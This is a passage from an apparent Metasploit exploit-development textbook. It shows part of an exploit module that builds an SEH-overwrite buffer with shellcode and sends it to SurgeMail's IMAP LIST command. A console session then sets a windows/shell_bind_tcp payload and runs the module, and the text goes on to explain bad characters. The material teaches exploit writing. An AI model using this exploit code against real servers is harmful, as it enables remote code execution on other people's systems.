210
Chapter 14
evil = lead + payload.encoded + near + nseh + [target.ret].pack("A3")
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
sock.put(sploit)
handler
disconnect
end
As you can see in this listing, the initial string of
A
s we used earlier is
replaced by NOPs minus the length of the shellcode that Metasploit generates
at . Notice that the buffer length, initially 10,356 bytes, has been decreased
by five bytes to 10,351 to account for the near jump instructions at . Finally,
the malicious string is built using all of the exploit’s components at .
Now we can select a real payload and execute the module to see what
happens. Surprisingly, the exploit completes but no session is created. The
exploit module connects and sends its payload, but no shell is returned to us,
as shown next:
msf exploit(surgemail_book) >
set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf exploit(surgemail_book) >
exploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >
Bad Characters and Remote Code Execution
Well, that certainly wasn’t expected: The exploit completes but no session
is created. If you check your debugger, you’ll see that the application didn’t
even crash—so what happened? Welcome to the sometimes challenging and
nearly always frustrating world of
bad characters
. Some characters, when sent
as part of an exploit buffer, get mangled while being read by the application.
The unfortunate result is that bad characters render your shellcode, and
sometimes the entire exploit, unusable.
When writing a Metasploit module, you should always be sure to identify
all the bad characters, because the shellcode that Metasploit generates differs
each time an exploit is launched, and any rogue bad characters will greatly
reduce a module’s reliability. In many cases, if you fail to find all the bad
characters, the application will crash without running the shellcode. In the
preceding example, SurgeMail didn’t even crash. The exploit appears to
succeed, but we don’t get a session.
There are many ways to identify bad characters, including replacing the
dynamically created shellcode with a string of sequential characters (
\x00\
x01\x02
…), and checking the debugger to see where the first character gets